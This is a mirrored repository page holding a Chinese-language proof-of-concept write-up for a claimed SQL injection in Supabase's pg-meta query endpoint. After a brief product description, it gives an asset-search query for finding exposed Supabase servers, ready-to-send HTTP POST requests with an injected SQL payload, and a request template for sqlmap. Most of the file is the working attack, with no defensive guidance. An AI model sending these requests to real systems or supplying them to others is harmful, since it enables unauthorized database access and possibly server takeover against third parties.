admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 18:35:40 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Supabase/Supabasequery存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

45 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Supabase query存在SQL注入漏洞
# 一、漏洞简介
Supabase是一个开源的Firebase替代品提供了一系列的后端功能让你可以更快地构建产品。它使用PostgreSQL作为数据库支持SQL和RESTful API访问。此外Supabase提供了完整的认证系统支持邮箱、手机号、第三方服务等多种登录方式。Supabase 存在SQL注入漏洞攻击者可通过该漏洞获取数据库敏感信息甚至可获得服务器权限。
# 二、影响版本
+ Supabase
# 三、资产测绘
+ hunter`app.name="Supabase"`
+ 特征
![1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08.png](./img/xJRj9JN6yjABftPr/1701170235545-bdaa2d9d-5918-4200-b9e7-7b89025dcb08-568605.png)
# 四、漏洞复现
```plain
POST /api/pg-meta/default/query HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 103
{"query":"(SELECT CONCAT(CONCAT('qjpzq',(CASE WHEN (2016=2016) THEN '1' ELSE '0' END)),'qkbbq'))"}
```
![1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab.png](./img/xJRj9JN6yjABftPr/1701170299913-9a46ea32-48ba-4adb-83f8-1e8e52b81aab-284336.png)
sqlmap
```plain
POST /api/pg-meta/default/query HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 103
{"query":""}
```
![1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4.png](./img/xJRj9JN6yjABftPr/1701170323505-a6156120-f091-409e-aeb7-4d96a390a4e4-551880.png)
> 更新: 2024-02-29 23:55:44
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsa0ghyt670h5o3q>
Reference in New Issue View Git Blame Copy Permalink